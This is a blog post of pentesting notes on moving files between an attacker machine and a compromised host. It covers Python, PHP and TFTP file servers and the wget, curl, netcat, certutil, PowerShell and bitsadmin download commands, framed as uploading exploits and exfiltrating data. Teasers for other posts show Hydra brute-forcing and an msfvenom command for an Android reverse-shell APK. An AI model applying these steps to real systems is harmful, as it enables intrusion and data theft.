Skip to main content

Files Transferring Techniques


        Often I struggled to transfer files from Host to Attacker and Attacker to Host.Sometimes i forget the commands and techniques that I learned before.So i am making notes of this to refer in future.We can easily downloads files from web server using browser..but what about command line.
        File Transfer is a pain, and in most cases,After gaining initial access on the target machine, and with file transfers, we can upload tools and exploits on the target to try and elevate the privileges, exfiltrate sensitive data from the target back to your machine or just move around files to/from the target and you.

Linux(Setting up the server's)


1.Apache
  • We can serve files using apache server,but i love using python modules instead of apache server.
  • Because first we need to move files into  /var/www/html  directory,then we need to start Apache server.
        service apache2 start

2.Simple Http Server(Using Python)
  • It uses port 8000 bydefault,if you want to change,you can specify according to yours.
   python -m SimpleHTTPServer [port]
                                            OR
    python3 -m SimpleHTTPServer [port]        

3.http.server(Using Python3)
  • It also uses 8000 port bydefault
            python  -m http.server [port]
                                            OR
            python3  -m http.server [port]

4.PyFTPD(FTPD Using Python Library)
  • PyFTPD is a FTP server based on pyftpdlib
  • It doesn’t come installed by default, but you can install it with apt : apt-get install python-pyftpdlib
           python -m pyftpdlib -p 21

5.PHP
  • Php web server runs only one single-threaded process.
            php  -S  localhost:8000
6.TFTP
  • Trivial File Transfer Protocol (TFTP) is a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host
            service atftpd start

Linux(File Transfer)


1.Wget
  • Most of the linux machines has wget pre-installed.
  • Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP
  • The gnu wget command supports username and password combo for both FTP and HTTP file retrieval.
           wget http://ip:port/file  -o outputfile

          wget --user=NAME --password='PASSWORD'  ftp://ip/file  -o outputfile

          wget --user=NAME --password='PASSWORD'  http://ip:port/file  -o outputfile
 
2.Curl
  • The curl tool lets us fetch a given URL from the command-line. Sometimes we want to save a web file to our own computer.
        curl http://ip:port  --output file

       curl --user username:password -o file ftp://ip/directory/file

 3.NetCat
  • Netcat is like a swiss army knife for geeks. It can be used for just about anything involving TCP or UDP. One of its most practical uses is to transfer files
                  * Sender's side
        nc  -nv  [ip]  [port]  > file
                 
                  * Receiver's side
        nc  -lvnp  [port]  < file
4.SCP
  • SCP (secure copy) is a command-line utility that allows you to securely copy files and directories between two locations.
  • The scp command relies on ssh for data transfer, so it requires an ssh key or password to authenticate on the remote systems
                  *  Copy a file from local to remote system
        scp filename remote_username@ip:/remote/directory
 
                  *  Copy a file from remote to local system
        scp remote_username@ip:/remote/file  /local/directory

5.rsync
  • rsync is a free software computer program for Unix and Linux like systems which synchronizes files and directories from one location to another while minimizing data transfer using delta encoding when appropriate.
                  * Local to Remote System
        rsync -v -e ssh filetoshare username@ip
 
                  * Remote to Local System
        rsync -v -e ssh username@ip:~/file localpath

Windows (File Transfer)


1.CertUtil
  • Windows has a built-in program called CertUtil, which can  be used to manage certificates in Windows. Using this program you can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows.
  • One of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL and save it as a local file
        certutil -urlcache -split -f "http://ip:port/file" [output-file]

2.PowerShell
  • Powershell is an advanced version of the standard cmd.exe with scripting capabilities. You can use a Powershell one-liner to download a file from a HTTP server
        powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')

3.BITS
  • The Background Intelligent Transfer Service, BITS for short and the built-in bitsadmin.exe command line utility can also be leveraged to download files over HTTP in the following way.
        bitsadmin /transfer job /download /priority high http://ip:port/file localpath




Thank You!!!!!!! 

Comments

Post a Comment

Popular posts from this blog

Exploiting All Ports in Different Techniques

In this section we will exploit the active ports in different techniques. The ports we are trying to exploit are FTP, SSH, TELNET, SMTP, NETBIOS-SSN, JAVA RMI, BINDSHELL, ProFTPD, MYSQL, DISTCCD, VNC, X11, UnrealIRCD, TOMCAT, RUBY-DRB. 1.  21-FTP Method 1: Login with Anonymous as username and no password. If you need more info about Anonymous FTP you can find it here. https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol ftp 192.168.0.130     Method 2 : Through Brute-force using Hydra but you need to have a custom list of usernames and passwords. hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V     It will take each username and password from the given files and try to login to the target FTP service. Once you found the credentials you can directly log in.     After log ging in  to a user account, You can get root access by doing Privilege escalation. Method 3 : Exploiting...
Post a Comment
Read more

Android Hacking With Metasploit

Hello This is my first blog regarding the android hacking with metasploit. I am in the learning stage and if you found some error then point out them and feel free to contact me. Step 1:- First of all we have to open terminal and start some services with commands like:-                                          (a) start apache2 start                                          (b) start postgresql start Then we have to start metasploit framework with the command msfconsole. Step 2:- Then we have to create android malware using metasploit framework in new window. Execute the Command:- msfvenom -p android/meterpreter/reverse_tcp LHOST= <attacker IP> LPORT= <attacker PORT> R > <filename.apk> N.B:- msfvenom is a command line code t...
Read more